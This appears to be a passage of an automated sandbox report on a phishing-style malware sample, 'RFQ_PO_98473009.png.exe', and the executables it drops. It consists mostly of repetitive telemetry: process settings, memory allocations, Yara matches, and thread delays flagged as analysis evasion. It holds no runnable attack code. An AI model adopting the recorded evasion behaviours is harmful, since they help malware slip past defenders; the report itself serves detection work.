                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match, File source: Process Memory Space: RFQ_PO_98473009.png.exe PID: 7376, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: lVbhkOPdhyxT.exe PID: 8052, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe Memory allocated: 1450000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe Memory allocated: 3130000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe Memory allocated: 16B0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe Memory allocated: 7C20000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe Memory allocated: 8C20000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe Memory allocated: 8DC0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe Memory allocated: 9DC0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe Memory allocated: 2000000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe Memory allocated: 2610000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe Memory allocated: 2330000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Memory allocated: 2270000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Memory allocated: 24E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Memory allocated: 44E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe Memory allocated: 2E60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe Memory allocated: 4E60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe Memory allocated: 7630000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe Memory allocated: 8630000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe Memory allocated: 87C0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe Memory allocated: 97C0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe Memory allocated: 2160000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe Memory allocated: 24E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe Memory allocated: 23E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Memory allocated: 2120000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Memory allocated: 2530000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Memory allocated: 21A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe Code function: 10_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 10_2_004019F0
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599875
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599764
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599652
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599531
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599422
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599309
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599187
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599078
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598968
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598859
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598750
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598640
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598531
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598421
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598312
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598202
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598093
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597982
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597840
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597710
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597594
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597469
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597359
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597250
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597140
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597031
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596922
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596812
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596703
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596593
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596484
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596375
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596232
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596109
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596000
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595890
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595781
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595672
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595562
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595453
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595343
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595234
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595125
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595015
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 594906
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 594797
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 594672
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 594562
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 594452
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 594343
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599875
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599765
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599656
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599546
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599436
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599327
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599219
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599109
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599000
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598890
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598781
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598672
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598561
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598453
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598343
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598234
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598124
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598015
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597906
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597796
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597687
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597576
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597465
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597327
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597217
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597107
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597000
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596891
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596766
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596641
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596531
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596422
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596313
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596188
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596063
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595953
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595844
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595719
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595609
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595500
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595390
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595281
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595172
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595062
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 594927
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 594812
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 594673
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 594521
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 594380
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6444
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7825
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Window / User API: threadDelayed 2162
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Window / User API: threadDelayed 7675
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Window / User API: foregroundWindowGot 1651
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Window / User API: threadDelayed 5939
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Window / User API: threadDelayed 3913
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe TID: 7396 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7820 Thread sleep time: -6456360425798339s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7732 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7848 Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7768 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 7976 Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 6164 Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -29514790517935264s >= -30000s
